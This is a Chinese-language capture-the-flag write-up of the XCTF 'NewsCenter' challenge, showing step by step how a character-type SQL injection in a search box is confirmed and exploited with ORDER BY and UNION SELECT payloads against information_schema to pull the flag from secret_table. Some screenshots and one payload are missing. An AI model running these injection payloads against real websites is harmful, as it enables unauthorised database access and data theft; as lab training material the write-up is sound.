攻防世界-NewsCenter

题目信息

分析过程

题目打开是有个输入框可以用来输入搜索信息，初步判断是个sql注入的题目。接下来判断能否进行sql注入：

输入 hi，有搜索结果，如下图:
输入hi',无结果，如下图：
初步判定是hi'后面还有单引号，导致重复输入导致的，（单引号与服务端代码中的'形成闭合，将我们输入的字符串hello包裹，服务端代码后面多出来一个'导致语法错误，而加入#将后面的'注释掉之后不会报错，可确定为字符型SQL注入。）为了证明判断结果，输入hi'#(意思#后面的内容都要呗注释掉)，结果如下图：
证明确实存在sql注入的问题，解题思路为朝着sql注入的方向努力。

解题过程

判断字段的个数：使用order by 确定。原理：order by根据前面查询内容的属性对查询数据进行分类,order by 后面的内容可以少于前面查询的属性数，但是不能多于查询的属性数
hi' order by 1#:
hi' order by 2#
hi' order by 3#
hi' order by 4#

证明是三个字段。

使用union联合表法注入。

输入hi' union select 1,2,3#:
只有2，3列回显，ps:

输入：

复制代码

hi' union select 1,#
hi' union select 1,2#
hi' union select 2,3#

都无法正常回显。

使用

hi' union select 1,database(),version()#

查询数据库版本和名称

可以看到数据库名称是news,数据库版本是5.5.61。版本是5.0版本以上，我们可以通过系统的数据库来获取很多想要的信息。

其中，database()的位置可以是任意的：（只要不是1就行，因为1不回显）

4.获取表名

hi' 复制代码

结果如下：

或者

复制代码

hi' union select 1,2,table_name from information_schema.tables where table_schema='news'#

结果如下：
得到表名news、secret_table

获取字段名：

hi' union select 1,2,column_name from information_schema.columns where table_name='secret_table' #

结果如下：
得到字段名id、fl4g；需要获得fl4g的字段内容

获得fl4g的字段内容,输入：

hi' union select 1,id,fl4g from news.secret_table #

获得flag：

攻防世界-NewsCenter

题目信息

分析过程

解题过程

相关知识